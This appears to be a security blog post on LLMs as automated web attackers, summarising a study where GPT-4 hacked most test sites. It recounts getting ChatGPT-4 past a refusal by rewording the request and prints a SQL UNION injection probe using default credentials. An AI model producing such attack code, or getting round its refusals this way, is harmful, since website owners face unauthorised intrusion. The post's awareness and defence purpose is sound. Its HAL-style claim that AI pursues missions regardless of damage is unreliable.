The New Cybersecurity Horizon: The Rise Of AI Attackers and AI Script Kiddies

--

We used to have a spectrum of attackers, from script kiddies to APT (Advanced Persistent Threat) actors. Basically, the script kiddies were easy to thwart, as they typically used standard tools and had a relatively low skill level. The APT actors, though, were difficult, as they often had a high skill level and were on a mission to achieve a goal.

But what happens when we merge the script kiddie with the APT actor and lower the bar, so that the script kiddie has the knowledge and mission of an APT actor? Well, with the rise of AI, we are now facing this threat, where AI turns against us and uses its knowledge to attack us.

The almost exponential rise of AI in the past few years has been highlighted by the jump from GPT-3 to GPT-4, where the new LLMs (Large Language Models) are able to act in a multimodal way, using video and audio rather than just interpreting text.

This article outlines this scenario, and shows how an LLM can become a sophisticated attacker with a high degree of success in hacking a website:

The authors found that GPT-4 managed to hack over 73% (11 out of 15) of the target websites (please forgive the typo on ‘assisatant’):

The example the authors give is a SQL union attack, which has a number of steps: navigate to a page, try a default username and password, and then attempt a GET request containing a UNION SQL command. If we ask ChatGPT-4 directly for this attack, it refuses:

But, if we just ask it to produce the code required, it gives away the code it can use:
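To make the steps above concrete, here is a rough sketch of what such a UNION-based probe could look like in Python. This is illustrative only: it is not the model's output or the paper's code, and the URL, parameter name and credentials are assumptions standing in for a deliberately vulnerable test application that you are authorised to test.

```python
# Hypothetical sketch of the steps described above, against an assumed
# deliberately vulnerable test application (authorised testing only).
import requests

BASE_URL = "http://testsite.local"  # hypothetical target (assumption)

session = requests.Session()

# Step 1: navigate to the login page and try a default username and password.
session.post(f"{BASE_URL}/login",
             data={"username": "admin", "password": "admin"})

# Step 2: attempt a GET request that injects a UNION SELECT into a parameter.
payload = "1 UNION SELECT username, password FROM users--"
resp = session.get(f"{BASE_URL}/items", params={"id": payload})

# Step 3: inspect the response for data that should not be visible.
print(resp.status_code)
print(resp.text[:500])
```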

In the end, an attacker would automate the attacks using API calls. If you want to understand these, try here:

https://medium.com/asecuritysite-when-bob-met-alice/is-it-cheaper-to-subscribe-to-chatgpt-and-dalle-3-or-to-use-apis-bfe36e37c391
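As a rough illustration of that automation, here is a minimal sketch of calling the OpenAI Chat Completions API from Python using the openai package. The model name and prompt are assumptions for illustration; nothing here is taken from the paper.

```python
# Minimal sketch of automating LLM prompting via the OpenAI API.
# Assumes the `openai` package is installed and OPENAI_API_KEY is set;
# the model name and prompt below are illustrative assumptions only.
from openai import OpenAI

client = OpenAI()  # reads the API key from the OPENAI_API_KEY environment variable

response = client.chat.completions.create(
    model="gpt-4",
    messages=[
        {"role": "system", "content": "You are a helpful assistant."},
        {"role": "user", "content": "Explain what a SQL UNION query does."},
    ],
)

print(response.choices[0].message.content)
```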

Conclusion

The AI-driven script kiddies will be bad enough, but think about attackers with high skill levels: they will be able to automate their attacks and scale them up to a vast level.

We need to invest massively in advancing our tools and in skilling up our cybersecurity defenders against the forthcoming onslaught of AI-generated actors. Once OpenAI releases Sora and Voice, we will be faced with multimodal attacks, where it will be difficult to tell real from fake. Just like HAL in 2001, AI is driven by a mission and will not stop until the mission is done, no matter the damage it may do to individuals or organisations:

So, if you are interested in AI and cybersecurity, and are okay with being scared, please come along to one of my forthcoming talks:

--


Prof Bill Buchanan OBE FRSE
ASecuritySite: When Bob Met Alice

Professor of Cryptography. Serial innovator. Believer in fairness, justice & freedom. Based in Edinburgh. Old World Breaker. New World Creator. Building trust.